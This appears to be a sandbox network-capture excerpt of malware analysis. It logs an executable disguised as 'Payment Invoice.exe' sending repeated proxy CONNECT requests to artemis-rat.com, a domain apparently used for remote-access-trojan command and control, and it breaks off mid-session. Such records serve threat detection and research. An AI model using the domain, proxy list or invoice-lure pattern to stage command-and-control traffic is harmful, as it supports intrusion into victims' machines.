                                                                1125192.168.2.45330061.92.189.15807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.546948910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1126192.168.2.45329361.178.152.3173027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.546962023 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:19.909779072 CET90INHTTP/1.1 200 OK
                                                                Content-Type: application/json
                                                                Connection: close
                                                                Content-Length: 55


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1127192.168.2.453304147.75.34.86807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.547297001 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:19.848613977 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3
                                                                Mar 11, 2024 16:15:19.849138021 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 06 c6 fb 2e 3e fb c9 55 fb 2b 3a 0b 6f 9f ad 6e 83 d5 df f0 91 3e a2 a2 4e 79 9a 65 9d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e .>U+:on>Nye*,+0/$#('=<5/Uartemis-rat.com#


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1128192.168.2.45267114.103.26.5380007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.559593916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.214524031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.532866001 CET741INHTTP/1.1 500 Internal Server Error
                                                                Server: nginx/1.19.2
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 579
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.19.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1129192.168.2.45331772.206.181.97649437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.565769911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1130192.168.2.45275995.111.227.164516107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.567107916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.714422941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1131192.168.2.45338972.10.160.90299197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.570626020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.526329041 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1132192.168.2.45339567.43.228.252286957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.570885897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1133192.168.2.45281334.135.203.17231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.571048021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.682969093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.777008057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.852030039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.886133909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1134192.168.2.45333598.162.25.2341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.572828054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1135192.168.2.45357643.157.17.1464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.573405027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1136192.168.2.45358043.157.17.1464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.575731039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1137192.168.2.45358343.157.17.1464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.576553106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1138192.168.2.45358543.157.17.1464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.578109980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1139192.168.2.45339792.204.135.37338997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.579730034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1140192.168.2.453392162.223.94.166807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.588104010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.234611988 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1141192.168.2.453303170.84.205.1741537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.591243982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1142192.168.2.45361143.153.55.2054437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.593821049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1143192.168.2.45361243.153.55.2054437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.595237017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1144192.168.2.45361443.153.55.2054437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.596600056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1145192.168.2.45361643.153.55.2054437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.597242117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1146192.168.2.45143195.56.254.13931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.644861937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.046627045 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1147192.168.2.453217117.160.250.163807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.644874096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.126105070 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1148192.168.2.453321196.20.125.14580837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.644877911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1149192.168.2.45330289.218.8.15210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.646008968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1150192.168.2.45334147.56.110.20489897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.646899939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.965706110 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.16.1
                                                                Date: Mon, 11 Mar 2024 15:00:11 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1151192.168.2.453339185.49.30.580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.647339106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1152192.168.2.453328185.101.16.52807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.647509098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1153192.168.2.45351123.227.38.230807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.655437946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.812966108 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1154192.168.2.45346967.43.236.1877977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.661153078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.466136932 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1155192.168.2.453513172.67.181.136807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.661340952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.815864086 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1156192.168.2.45351645.12.31.104807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.661433935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
